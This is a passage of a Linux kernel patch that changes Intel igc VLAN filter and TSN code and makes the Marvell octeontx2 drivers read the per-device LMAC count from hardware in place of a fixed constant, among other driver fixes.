+ 	if ((fsp->flow_type & FLOW_EXT) && fsp->m_ext.vlan_tci) {
+ 		rule->filter.vlan_tci = ntohs(fsp->h_ext.vlan_tci);
++		rule->filter.vlan_tci_mask = ntohs(fsp->m_ext.vlan_tci);
+ 		rule->filter.match_flags |= IGC_FILTER_FLAG_VLAN_TCI;
+ 	}
+ 
+@@ -1254,11 +1262,19 @@ static void igc_ethtool_init_nfc_rule(struct igc_nfc_rule *rule,
+ 		memcpy(rule->filter.user_mask, fsp->m_ext.data, sizeof(fsp->m_ext.data));
+ 	}
+ 
+-	/* When multiple filter options or user data or vlan etype is set, use a
+-	 * flex filter.
++	/* The i225/i226 has various different filters. Flex filters provide a
++	 * way to match up to the first 128 bytes of a packet. Use them for:
++	 *   a) For specific user data
++	 *   b) For VLAN EtherType
++	 *   c) For full TCI match
++	 *   d) Or in case multiple filter criteria are set
++	 *
++	 * Otherwise, use the simple MAC, VLAN PRIO or EtherType filters.
+ 	 */
+ 	if ((rule->filter.match_flags & IGC_FILTER_FLAG_USER_DATA) ||
+ 	    (rule->filter.match_flags & IGC_FILTER_FLAG_VLAN_ETYPE) ||
++	    ((rule->filter.match_flags & IGC_FILTER_FLAG_VLAN_TCI) &&
++	     rule->filter.vlan_tci_mask == ntohs(VLAN_TCI_FULL_MASK)) ||
+ 	    (rule->filter.match_flags & (rule->filter.match_flags - 1)))
+ 		rule->flex = true;
+ 	else
+@@ -1328,6 +1344,26 @@ static int igc_ethtool_add_nfc_rule(struct igc_adapter *adapter,
+ 		return -EINVAL;
+ 	}
+ 
++	/* There are two ways to match the VLAN TCI:
++	 *  1. Match on PCP field and use vlan prio filter for it
++	 *  2. Match on complete TCI field and use flex filter for it
++	 */
++	if ((fsp->flow_type & FLOW_EXT) &&
++	    fsp->m_ext.vlan_tci &&
++	    fsp->m_ext.vlan_tci != htons(VLAN_PRIO_MASK) &&
++	    fsp->m_ext.vlan_tci != VLAN_TCI_FULL_MASK) {
++		netdev_dbg(netdev, "VLAN mask not supported\n");
++		return -EOPNOTSUPP;
++	}
++
++	/* VLAN EtherType can only be matched by full mask. */
++	if ((fsp->flow_type & FLOW_EXT) &&
++	    fsp->m_ext.vlan_etype &&
++	    fsp->m_ext.vlan_etype != ETHER_TYPE_FULL_MASK) {
++		netdev_dbg(netdev, "VLAN EtherType mask not supported\n");
++		return -EOPNOTSUPP;
++	}
++
+ 	if (fsp->location >= IGC_MAX_RXNFC_RULES) {
+ 		netdev_dbg(netdev, "Invalid location\n");
+ 		return -EINVAL;
+diff --git a/drivers/net/ethernet/intel/igc/igc_tsn.c b/drivers/net/ethernet/intel/igc/igc_tsn.c
+index 725db36e399d2..31ea0781b65ec 100644
+--- a/drivers/net/ethernet/intel/igc/igc_tsn.c
++++ b/drivers/net/ethernet/intel/igc/igc_tsn.c
+@@ -178,7 +178,7 @@ static int igc_tsn_enable_offload(struct igc_adapter *adapter)
+ 			wr32(IGC_TQAVCC(i), tqavcc);
+ 
+ 			wr32(IGC_TQAVHC(i),
+-			     0x80000000 + ring->hicredit * 0x7735);
++			     0x80000000 + ring->hicredit * 0x7736);
+ 		} else {
+ 			/* Disable any CBS for the queue */
+ 			txqctl &= ~(IGC_TXQCTL_QAV_SEL_MASK);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+index 65c0373d34d12..90be87dc105d3 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+@@ -78,7 +78,7 @@ static bool is_dev_rpm(void *cgxd)
+ 
+ bool is_lmac_valid(struct cgx *cgx, int lmac_id)
+ {
+-	if (!cgx || lmac_id < 0 || lmac_id >= MAX_LMAC_PER_CGX)
++	if (!cgx || lmac_id < 0 || lmac_id >= cgx->max_lmac_per_mac)
+ 		return false;
+ 	return test_bit(lmac_id, &cgx->lmac_bmap);
+ }
+@@ -90,7 +90,7 @@ static int get_sequence_id_of_lmac(struct cgx *cgx, int lmac_id)
+ {
+ 	int tmp, id = 0;
+ 
+-	for_each_set_bit(tmp, &cgx->lmac_bmap, MAX_LMAC_PER_CGX) {
++	for_each_set_bit(tmp, &cgx->lmac_bmap, cgx->max_lmac_per_mac) {
+ 		if (tmp == lmac_id)
+ 			break;
+ 		id++;
+@@ -121,7 +121,7 @@ u64 cgx_read(struct cgx *cgx, u64 lmac, u64 offset)
+ 
+ struct lmac *lmac_pdata(u8 lmac_id, struct cgx *cgx)
+ {
+-	if (!cgx || lmac_id >= MAX_LMAC_PER_CGX)
++	if (!cgx || lmac_id >= cgx->max_lmac_per_mac)
+ 		return NULL;
+ 
+ 	return cgx->lmac_idmap[lmac_id];
+@@ -1410,7 +1410,7 @@ int cgx_get_fwdata_base(u64 *base)
+ 	if (!cgx)
+ 		return -ENXIO;
+ 
+-	first_lmac = find_first_bit(&cgx->lmac_bmap, MAX_LMAC_PER_CGX);
++	first_lmac = find_first_bit(&cgx->lmac_bmap, cgx->max_lmac_per_mac);
+ 	req = FIELD_SET(CMDREG_ID, CGX_CMD_GET_FWD_BASE, req);
+ 	err = cgx_fwi_cmd_generic(req, &resp, cgx, first_lmac);
+ 	if (!err)
+@@ -1499,7 +1499,7 @@ static int cgx_fwi_link_change(struct cgx *cgx, int lmac_id, bool enable)
+ 
+ static inline int cgx_fwi_read_version(u64 *resp, struct cgx *cgx)
+ {
+-	int first_lmac = find_first_bit(&cgx->lmac_bmap, MAX_LMAC_PER_CGX);
++	int first_lmac = find_first_bit(&cgx->lmac_bmap, cgx->max_lmac_per_mac);
+ 	u64 req = 0;
+ 
+ 	req = FIELD_SET(CMDREG_ID, CGX_CMD_GET_FW_VER, req);
+@@ -1537,7 +1537,7 @@ static void cgx_lmac_linkup_work(struct work_struct *work)
+ 	int i, err;
+ 
+ 	/* Do Link up for all the enabled lmacs */
+-	for_each_set_bit(i, &cgx->lmac_bmap, MAX_LMAC_PER_CGX) {
++	for_each_set_bit(i, &cgx->lmac_bmap, cgx->max_lmac_per_mac) {
+ 		err = cgx_fwi_link_change(cgx, i, true);
+ 		if (err)
+ 			dev_info(dev, "cgx port %d:%d Link up command failed\n",
+@@ -1557,14 +1557,6 @@ int cgx_lmac_linkup_start(void *cgxd)
+ 	return 0;
+ }
+ 
+-static void cgx_lmac_get_fifolen(struct cgx *cgx)
+-{
+-	u64 cfg;
+-
+-	cfg = cgx_read(cgx, 0, CGX_CONST);
+-	cgx->mac_ops->fifo_len = FIELD_GET(CGX_CONST_RXFIFO_SIZE, cfg);
+-}
+-
+ static int cgx_configure_interrupt(struct cgx *cgx, struct lmac *lmac,
+ 				   int cnt, bool req_free)
+ {
+@@ -1619,17 +1611,14 @@ static int cgx_lmac_init(struct cgx *cgx)
+ 	u64 lmac_list;
+ 	int i, err;
+ 
+-	cgx_lmac_get_fifolen(cgx);
+-
+-	cgx->lmac_count = cgx->mac_ops->get_nr_lmacs(cgx);
+ 	/* lmac_list specifies which lmacs are enabled
+ 	 * when bit n is set to 1, LMAC[n] is enabled
+ 	 */
+ 	if (cgx->mac_ops->non_contiguous_serdes_lane)
+ 		lmac_list = cgx_read(cgx, 0, CGXX_CMRX_RX_LMACS) & 0xFULL;
+ 
+-	if (cgx->lmac_count > MAX_LMAC_PER_CGX)
+-		cgx->lmac_count = MAX_LMAC_PER_CGX;
++	if (cgx->lmac_count > cgx->max_lmac_per_mac)
++		cgx->lmac_count = cgx->max_lmac_per_mac;
+ 
+ 	for (i = 0; i < cgx->lmac_count; i++) {
+ 		lmac = kzalloc(sizeof(struct lmac), GFP_KERNEL);
+@@ -1707,7 +1696,7 @@ static int cgx_lmac_exit(struct cgx *cgx)
+ 	}
+ 
+ 	/* Free all lmac related resources */
+-	for_each_set_bit(i, &cgx->lmac_bmap, MAX_LMAC_PER_CGX) {
++	for_each_set_bit(i, &cgx->lmac_bmap, cgx->max_lmac_per_mac) {
+ 		lmac = cgx->lmac_idmap[i];
+ 		if (!lmac)
+ 			continue;
+@@ -1723,6 +1712,12 @@ static int cgx_lmac_exit(struct cgx *cgx)
+ 
+ static void cgx_populate_features(struct cgx *cgx)
+ {
++	u64 cfg;
++
++	cfg = cgx_read(cgx, 0, CGX_CONST);
++	cgx->mac_ops->fifo_len = FIELD_GET(CGX_CONST_RXFIFO_SIZE, cfg);
++	cgx->max_lmac_per_mac = FIELD_GET(CGX_CONST_MAX_LMACS, cfg);
++
+ 	if (is_dev_rpm(cgx))
+ 		cgx->hw_features = (RVU_LMAC_FEAT_DMACF | RVU_MAC_RPM |
+ 				    RVU_LMAC_FEAT_FC | RVU_LMAC_FEAT_PTP);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.h b/drivers/net/ethernet/marvell/octeontx2/af/cgx.h
+index 04338db38671b..09ddb00f63cc7 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.h
+@@ -18,11 +18,8 @@
+ /* PCI BAR nos */
+ #define PCI_CFG_REG_BAR_NUM		0
+ 
+-#define CGX_ID_MASK			0x7
+-#define MAX_LMAC_PER_CGX		4
++#define CGX_ID_MASK			0xF
+ #define MAX_DMAC_ENTRIES_PER_CGX	32
+-#define CGX_FIFO_LEN			65536 /* 64K for both Rx & Tx */
+-#define CGX_OFFSET(x)			((x) * MAX_LMAC_PER_CGX)
+ 
+ /* Registers */
+ #define CGXX_CMRX_CFG			0x00
+@@ -56,6 +53,7 @@
+ #define CGXX_SCRATCH1_REG		0x1058
+ #define CGX_CONST			0x2000
+ #define CGX_CONST_RXFIFO_SIZE	        GENMASK_ULL(23, 0)
++#define CGX_CONST_MAX_LMACS	        GENMASK_ULL(31, 24)
+ #define CGXX_SPUX_CONTROL1		0x10000
+ #define CGXX_SPUX_LNX_FEC_CORR_BLOCKS	0x10700
+ #define CGXX_SPUX_LNX_FEC_UNCORR_BLOCKS	0x10800
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/lmac_common.h b/drivers/net/ethernet/marvell/octeontx2/af/lmac_common.h
+index 52b6016789fa4..697cfec74aa1e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/lmac_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/lmac_common.h
+@@ -128,7 +128,10 @@ struct cgx {
+ 	struct pci_dev		*pdev;
+ 	u8			cgx_id;
+ 	u8			lmac_count;
+-	struct lmac		*lmac_idmap[MAX_LMAC_PER_CGX];
++	/* number of LMACs per MAC could be 4 or 8 */
++	u8			max_lmac_per_mac;
++#define MAX_LMAC_COUNT		8
++	struct lmac             *lmac_idmap[MAX_LMAC_COUNT];
+ 	struct			work_struct cgx_cmd_work;
+ 	struct			workqueue_struct *cgx_cmd_workq;
+ 	struct list_head	cgx_list;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/npc.h b/drivers/net/ethernet/marvell/octeontx2/af/npc.h
+index d027c23b8ef8e..aaff91bc7415a 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/npc.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/npc.h
+@@ -514,7 +514,7 @@ struct npc_lt_def {
+ 	u8	ltype_mask;
+ 	u8	ltype_match;
+ 	u8	lid;
+-};
++} __packed;
+ 
+ struct npc_lt_def_ipsec {
+ 	u8	ltype_mask;
+@@ -522,7 +522,7 @@ struct npc_lt_def_ipsec {
+ 	u8	lid;
+ 	u8	spi_offset;
+ 	u8	spi_nz;
+-};
++} __packed;
+ 
+ struct npc_lt_def_apad {
+ 	u8	ltype_mask;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rpm.c b/drivers/net/ethernet/marvell/octeontx2/af/rpm.c
+index a70e1153fa04b..6b4792a942d84 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rpm.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rpm.c
+@@ -283,6 +283,11 @@ void rpm_lmac_pause_frm_config(void *rpmd, int lmac_id, bool enable)
+ 	cfg = FIELD_SET(RPM_PFC_CLASS_MASK, 0, cfg);
+ 	rpm_write(rpm, lmac_id, RPMX_CMRX_PRT_CBFC_CTL, cfg);
+ 
++	/* Disable forward pause to driver */
++	cfg = rpm_read(rpm, lmac_id, RPMX_MTI_MAC100X_COMMAND_CONFIG);
++	cfg &= ~RPMX_MTI_MAC100X_COMMAND_CONFIG_PAUSE_FWD;
++	rpm_write(rpm, lmac_id, RPMX_MTI_MAC100X_COMMAND_CONFIG, cfg);
++
+ 	/* Enable channel mask for all LMACS */
+ 	rpm_write(rpm, 0, RPMX_CMR_CHAN_MSK_OR, ~0ULL);
+ }
+@@ -451,12 +456,10 @@ int rpm_lmac_pfc_config(void *rpmd, int lmac_id, u8 tx_pause, u8 rx_pause, u16 p
+ 
+ 	if (rx_pause) {
+ 		cfg &= ~(RPMX_MTI_MAC100X_COMMAND_CONFIG_RX_P_DISABLE |
+-				RPMX_MTI_MAC100X_COMMAND_CONFIG_PAUSE_IGNORE |
+-				RPMX_MTI_MAC100X_COMMAND_CONFIG_PAUSE_FWD);
++			 RPMX_MTI_MAC100X_COMMAND_CONFIG_PAUSE_IGNORE);
+ 	} else {
+ 		cfg |= (RPMX_MTI_MAC100X_COMMAND_CONFIG_RX_P_DISABLE |
+-				RPMX_MTI_MAC100X_COMMAND_CONFIG_PAUSE_IGNORE |
+-				RPMX_MTI_MAC100X_COMMAND_CONFIG_PAUSE_FWD);
++			RPMX_MTI_MAC100X_COMMAND_CONFIG_PAUSE_IGNORE);
+ 	}
+ 
+ 	if (tx_pause) {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index 95a7bc396e8ea..0b76dfa979d4e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -480,7 +480,7 @@ struct rvu {
+ 	u8			cgx_mapped_pfs;
+ 	u8			cgx_cnt_max;	 /* CGX port count max */
+ 	u8			*pf2cgxlmac_map; /* pf to cgx_lmac map */
+-	u16			*cgxlmac2pf_map; /* bitmap of mapped pfs for
++	u64			*cgxlmac2pf_map; /* bitmap of mapped pfs for
+ 						  * every cgx lmac port
+ 						  */
+ 	unsigned long		pf_notify_bmap; /* Flags for PF notification */
+@@ -850,6 +850,7 @@ u32  rvu_cgx_get_fifolen(struct rvu *rvu);
+ void *rvu_first_cgx_pdata(struct rvu *rvu);
+ int cgxlmac_to_pf(struct rvu *rvu, int cgx_id, int lmac_id);
+ int rvu_cgx_config_tx(void *cgxd, int lmac_id, bool enable);
++int rvu_cgx_tx_enable(struct rvu *rvu, u16 pcifunc, bool enable);
+ int rvu_cgx_prio_flow_ctrl_cfg(struct rvu *rvu, u16 pcifunc, u8 tx_pause, u8 rx_pause,
+ 			       u16 pfc_en);
+ int rvu_cgx_cfg_pause_frm(struct rvu *rvu, u16 pcifunc, u8 tx_pause, u8 rx_pause);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+index c60b9580ca969..bcb4385d0621c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+@@ -55,8 +55,9 @@ bool is_mac_feature_supported(struct rvu *rvu, int pf, int feature)
+ 	return  (cgx_features_get(cgxd) & feature);
+ }
+ 
++#define CGX_OFFSET(x)			((x) * rvu->hw->lmac_per_cgx)
+ /* Returns bitmap of mapped PFs */
+-static u16 cgxlmac_to_pfmap(struct rvu *rvu, u8 cgx_id, u8 lmac_id)
++static u64 cgxlmac_to_pfmap(struct rvu *rvu, u8 cgx_id, u8 lmac_id)
+ {
+ 	return rvu->cgxlmac2pf_map[CGX_OFFSET(cgx_id) + lmac_id];
+ }
+@@ -71,7 +72,8 @@ int cgxlmac_to_pf(struct rvu *rvu, int cgx_id, int lmac_id)
+ 	if (!pfmap)
+ 		return -ENODEV;
+ 	else
+-		return find_first_bit(&pfmap, 16);
++		return find_first_bit(&pfmap,
++				      rvu->cgx_cnt_max * rvu->hw->lmac_per_cgx);
+ }
+ 
+ static u8 cgxlmac_id_to_bmap(u8 cgx_id, u8 lmac_id)
+@@ -129,14 +131,14 @@ static int rvu_map_cgx_lmac_pf(struct rvu *rvu)
+ 	if (!cgx_cnt_max)
+ 		return 0;
+ 
+-	if (cgx_cnt_max > 0xF || MAX_LMAC_PER_CGX > 0xF)
++	if (cgx_cnt_max > 0xF || rvu->hw->lmac_per_cgx > 0xF)
+ 		return -EINVAL;
+ 
+ 	/* Alloc map table
+ 	 * An additional entry is required since PF id starts from 1 and
+ 	 * hence entry at offset 0 is invalid.
+ 	 */
+-	size = (cgx_cnt_max * MAX_LMAC_PER_CGX + 1) * sizeof(u8);
++	size = (cgx_cnt_max * rvu->hw->lmac_per_cgx + 1) * sizeof(u8);
+ 	rvu->pf2cgxlmac_map = devm_kmalloc(rvu->dev, size, GFP_KERNEL);
+ 	if (!rvu->pf2cgxlmac_map)
+ 		return -ENOMEM;
+@@ -145,9 +147,10 @@ static int rvu_map_cgx_lmac_pf(struct rvu *rvu)
+ 	memset(rvu->pf2cgxlmac_map, 0xFF, size);
+ 
+ 	/* Reverse map table */
+-	rvu->cgxlmac2pf_map = devm_kzalloc(rvu->dev,
+-				  cgx_cnt_max * MAX_LMAC_PER_CGX * sizeof(u16),
+-				  GFP_KERNEL);
++	rvu->cgxlmac2pf_map =
++		devm_kzalloc(rvu->dev,
++			     cgx_cnt_max * rvu->hw->lmac_per_cgx * sizeof(u64),
++			     GFP_KERNEL);
+ 	if (!rvu->cgxlmac2pf_map)
+ 		return -ENOMEM;
+ 
+@@ -156,7 +159,7 @@ static int rvu_map_cgx_lmac_pf(struct rvu *rvu)
+ 		if (!rvu_cgx_pdata(cgx, rvu))
+ 			continue;
+ 		lmac_bmap = cgx_get_lmac_bmap(rvu_cgx_pdata(cgx, rvu));
+-		for_each_set_bit(iter, &lmac_bmap, MAX_LMAC_PER_CGX) {
++		for_each_set_bit(iter, &lmac_bmap, rvu->hw->lmac_per_cgx) {
+ 			lmac = cgx_get_lmacid(rvu_cgx_pdata(cgx, rvu),
+ 					      iter);
+ 			rvu->pf2cgxlmac_map[pf] = cgxlmac_id_to_bmap(cgx, lmac);
+@@ -235,7 +238,8 @@ static void cgx_notify_pfs(struct cgx_link_event *event, struct rvu *rvu)
+ 	pfmap = cgxlmac_to_pfmap(rvu, event->cgx_id, event->lmac_id);
+ 
+ 	do {
+-		pfid = find_first_bit(&pfmap, 16);
++		pfid = find_first_bit(&pfmap,
++				      rvu->cgx_cnt_max * rvu->hw->lmac_per_cgx);
+ 		clear_bit(pfid, &pfmap);
+ 
+ 		/* check if notification is enabled */
+@@ -310,7 +314,7 @@ static int cgx_lmac_event_handler_init(struct rvu *rvu)
+ 		if (!cgxd)
+ 			continue;
+ 		lmac_bmap = cgx_get_lmac_bmap(cgxd);
+-		for_each_set_bit(lmac, &lmac_bmap, MAX_LMAC_PER_CGX) {
++		for_each_set_bit(lmac, &lmac_bmap, rvu->hw->lmac_per_cgx) {
+ 			err = cgx_lmac_evh_register(&cb, cgxd, lmac);
+ 			if (err)
+ 				dev_err(rvu->dev,
+@@ -396,7 +400,7 @@ int rvu_cgx_exit(struct rvu *rvu)
+ 		if (!cgxd)
+ 			continue;
+ 		lmac_bmap = cgx_get_lmac_bmap(cgxd);
+-		for_each_set_bit(lmac, &lmac_bmap, MAX_LMAC_PER_CGX)
++		for_each_set_bit(lmac, &lmac_bmap, rvu->hw->lmac_per_cgx)
+ 			cgx_lmac_evh_unregister(cgxd, lmac);
+ 	}
+ 
+@@ -456,6 +460,23 @@ int rvu_cgx_config_rxtx(struct rvu *rvu, u16 pcifunc, bool start)
+ 	return mac_ops->mac_rx_tx_enable(cgxd, lmac_id, start);
+ }
+ 
++int rvu_cgx_tx_enable(struct rvu *rvu, u16 pcifunc, bool enable)
++{
++	int pf = rvu_get_pf(pcifunc);
++	struct mac_ops *mac_ops;
++	u8 cgx_id, lmac_id;
++	void *cgxd;
++
++	if (!is_cgx_config_permitted(rvu, pcifunc))
++		return LMAC_AF_ERR_PERM_DENIED;
++
++	rvu_get_cgx_lmac_id(rvu->pf2cgxlmac_map[pf], &cgx_id, &lmac_id);
++	cgxd = rvu_cgx_pdata(cgx_id, rvu);
++	mac_ops = get_mac_ops(cgxd);
++
++	return mac_ops->mac_tx_enable(cgxd, lmac_id, enable);
++}
++
+ int rvu_cgx_config_tx(void *cgxd, int lmac_id, bool enable)
+ {
+ 	struct mac_ops *mac_ops;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+index 5c9dc3f9262f5..cc5d342e026c7 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+@@ -2618,7 +2618,7 @@ static void rvu_dbg_cgx_init(struct rvu *rvu)
+ 		rvu->rvu_dbg.cgx = debugfs_create_dir(dname,
+ 						      rvu->rvu_dbg.cgx_root);
+ 
+-		for_each_set_bit(lmac_id, &lmac_bmap, MAX_LMAC_PER_CGX) {
++		for_each_set_bit(lmac_id, &lmac_bmap, rvu->hw->lmac_per_cgx) {
+ 			/* lmac debugfs dir */
+ 			sprintf(dname, "lmac%d", lmac_id);
+ 			rvu->rvu_dbg.lmac =
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 959f36efdc4a6..bb99302eab67a 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -3923,90 +3923,18 @@ static void nix_find_link_frs(struct rvu *rvu,
+ 		req->minlen = minlen;
+ }
+ 
+-static int
+-nix_config_link_credits(struct rvu *rvu, int blkaddr, int link,
+-			u16 pcifunc, u64 tx_credits)
+-{
+-	struct rvu_hwinfo *hw = rvu->hw;
+-	int pf = rvu_get_pf(pcifunc);
+-	u8 cgx_id = 0, lmac_id = 0;
+-	unsigned long poll_tmo;
+-	bool restore_tx_en = 0;
+-	struct nix_hw *nix_hw;
+-	u64 cfg, sw_xoff = 0;
+-	u32 schq = 0;
+-	u32 credits;
+-	int rc;
+-
+-	nix_hw = get_nix_hw(rvu->hw, blkaddr);
+-	if (!nix_hw)
+-		return NIX_AF_ERR_INVALID_NIXBLK;
+-
+-	if (tx_credits == nix_hw->tx_credits[link])
+-		return 0;
+-
+-	/* Enable cgx tx if disabled for credits to be back */
+-	if (is_pf_cgxmapped(rvu, pf)) {
+-		rvu_get_cgx_lmac_id(rvu->pf2cgxlmac_map[pf], &cgx_id, &lmac_id);
+-		restore_tx_en = !rvu_cgx_config_tx(rvu_cgx_pdata(cgx_id, rvu),
+-						    lmac_id, true);
+-	}
+-
+-	mutex_lock(&rvu->rsrc_lock);
+-	/* Disable new traffic to link */
+-	if (hw->cap.nix_shaping) {
+-		schq = nix_get_tx_link(rvu, pcifunc);
+-		sw_xoff = rvu_read64(rvu, blkaddr, NIX_AF_TL1X_SW_XOFF(schq));
+-		rvu_write64(rvu, blkaddr,
+-			    NIX_AF_TL1X_SW_XOFF(schq), BIT_ULL(0));
+-	}
+-
+-	rc = NIX_AF_ERR_LINK_CREDITS;
+-	poll_tmo = jiffies + usecs_to_jiffies(200000);
+-	/* Wait for credits to return */
+-	do {
+-		if (time_after(jiffies, poll_tmo))
+-			goto exit;
+-		usleep_range(100, 200);
+-
+-		cfg = rvu_read64(rvu, blkaddr,
+-				 NIX_AF_TX_LINKX_NORM_CREDIT(link));
+-		credits = (cfg >> 12) & 0xFFFFFULL;
+-	} while (credits != nix_hw->tx_credits[link]);
+-
+-	cfg &= ~(0xFFFFFULL << 12);
+-	cfg |= (tx_credits << 12);
+-	rvu_write64(rvu, blkaddr, NIX_AF_TX_LINKX_NORM_CREDIT(link), cfg);
+-	rc = 0;
+-
+-	nix_hw->tx_credits[link] = tx_credits;
+-
+-exit:
+-	/* Enable traffic back */
+-	if (hw->cap.nix_shaping && !sw_xoff)
+-		rvu_write64(rvu, blkaddr, NIX_AF_TL1X_SW_XOFF(schq), 0);
+-
+-	/* Restore state of cgx tx */
+-	if (restore_tx_en)
+-		rvu_cgx_config_tx(rvu_cgx_pdata(cgx_id, rvu), lmac_id, false);
+-
+-	mutex_unlock(&rvu->rsrc_lock);
+-	return rc;
+-}
+-
+ int rvu_mbox_handler_nix_set_hw_frs(struct rvu *rvu, struct nix_frs_cfg *req,
+ 				    struct msg_rsp *rsp)
+ {
+ 	struct rvu_hwinfo *hw = rvu->hw;
+ 	u16 pcifunc = req->hdr.pcifunc;
+ 	int pf = rvu_get_pf(pcifunc);
+-	int blkaddr, schq, link = -1;
+-	struct nix_txsch *txsch;
+-	u64 cfg, lmac_fifo_len;
++	int blkaddr, link = -1;
+ 	struct nix_hw *nix_hw;
+ 	struct rvu_pfvf *pfvf;
+ 	u8 cgx = 0, lmac = 0;
+ 	u16 max_mtu;
++	u64 cfg;
+ 
+ 	blkaddr = rvu_get_blkaddr(rvu, BLKTYPE_NIX, pcifunc);
+ 	if (blkaddr < 0)
+@@ -4027,25 +3955,6 @@ int rvu_mbox_handler_nix_set_hw_frs(struct rvu *rvu, struct nix_frs_cfg *req,
+ 	if (req->update_minlen && req->minlen < NIC_HW_MIN_FRS)
+ 		return NIX_AF_ERR_FRS_INVALID;
+ 
+-	/* Check if requester wants to update SMQ's */
+-	if (!req->update_smq)
+-		goto rx_frscfg;
+-
+-	/* Update min/maxlen in each of the SMQ attached to this PF/VF */
+-	txsch = &nix_hw->txsch[NIX_TXSCH_LVL_SMQ];
+-	mutex_lock(&rvu->rsrc_lock);
+-	for (schq = 0; schq < txsch->schq.max; schq++) {
+-		if (TXSCH_MAP_FUNC(txsch->pfvf_map[schq]) != pcifunc)
+-			continue;
+-		cfg = rvu_read64(rvu, blkaddr, NIX_AF_SMQX_CFG(schq));
+-		cfg = (cfg & ~(0xFFFFULL << 8)) | ((u64)req->maxlen << 8);
+-		if (req->update_minlen)
+-			cfg = (cfg & ~0x7FULL) | ((u64)req->minlen & 0x7F);
+-		rvu_write64(rvu, blkaddr, NIX_AF_SMQX_CFG(schq), cfg);
+-	}
+-	mutex_unlock(&rvu->rsrc_lock);
+-
+-rx_frscfg:
+ 	/* Check if config is for SDP link */
+ 	if (req->sdp_link) {
+ 		if (!hw->sdp_links)
+@@ -4068,7 +3977,6 @@ rx_frscfg:
+ 	if (link < 0)
+ 		return NIX_AF_ERR_RX_LINK_INVALID;
+ 
+-
+ linkcfg:
+ 	nix_find_link_frs(rvu, req, pcifunc);
+ 
+@@ -4078,19 +3986,7 @@ linkcfg:
+ 		cfg = (cfg & ~0xFFFFULL) | req->minlen;
+ 	rvu_write64(rvu, blkaddr, NIX_AF_RX_LINKX_CFG(link), cfg);
+ 
+-	if (req->sdp_link || pf == 0)
+-		return 0;
+-
+-	/* Update transmit credits for CGX links */
+-	lmac_fifo_len = rvu_cgx_get_lmac_fifolen(rvu, cgx, lmac);
+-	if (!lmac_fifo_len) {
+-		dev_err(rvu->dev,
+-			"%s: Failed to get CGX/RPM%d:LMAC%d FIFO size\n",
+-			__func__, cgx, lmac);
+-		return 0;
+-	}
+-	return nix_config_link_credits(rvu, blkaddr, link, pcifunc,
+-				       (lmac_fifo_len - req->maxlen) / 16);
++	return 0;
+ }
+ 
+ int rvu_mbox_handler_nix_set_rx_cfg(struct rvu *rvu, struct nix_rx_cfg *req,
+@@ -4183,7 +4079,7 @@ static void nix_link_config(struct rvu *rvu, int blkaddr,
+ 
+ 		/* Get LMAC id's from bitmap */
+ 		lmac_bmap = cgx_get_lmac_bmap(rvu_cgx_pdata(cgx, rvu));
+-		for_each_set_bit(iter, &lmac_bmap, MAX_LMAC_PER_CGX) {
++		for_each_set_bit(iter, &lmac_bmap, rvu->hw->lmac_per_cgx) {
+ 			lmac_fifo_len = rvu_cgx_get_lmac_fifolen(rvu, cgx, iter);
+ 			if (!lmac_fifo_len) {
+ 				dev_err(rvu->dev,
+@@ -4610,7 +4506,13 @@ int rvu_mbox_handler_nix_lf_stop_rx(struct rvu *rvu, struct msg_req *req,
+ 	pfvf = rvu_get_pfvf(rvu, pcifunc);
+ 	clear_bit(NIXLF_INITIALIZED, &pfvf->flags);
+ 
+-	return rvu_cgx_start_stop_io(rvu, pcifunc, false);
++	err = rvu_cgx_start_stop_io(rvu, pcifunc, false);
++	if (err)
++		return err;
++
++	rvu_cgx_tx_enable(rvu, pcifunc, true);
++
++	return 0;
+ }
+ 
+ #define RX_SA_BASE  GENMASK_ULL(52, 7)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+index 34fa59575fa91..54e0dfdc9d984 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+@@ -1999,7 +1999,9 @@ int rvu_npc_exact_init(struct rvu *rvu)
+ 	/* Install SDP drop rule */
+ 	drop_mcam_idx = &table->num_drop_rules;
+ 
+-	max_lmac_cnt = rvu->cgx_cnt_max * MAX_LMAC_PER_CGX + PF_CGXMAP_BASE;
++	max_lmac_cnt = rvu->cgx_cnt_max * rvu->hw->lmac_per_cgx +
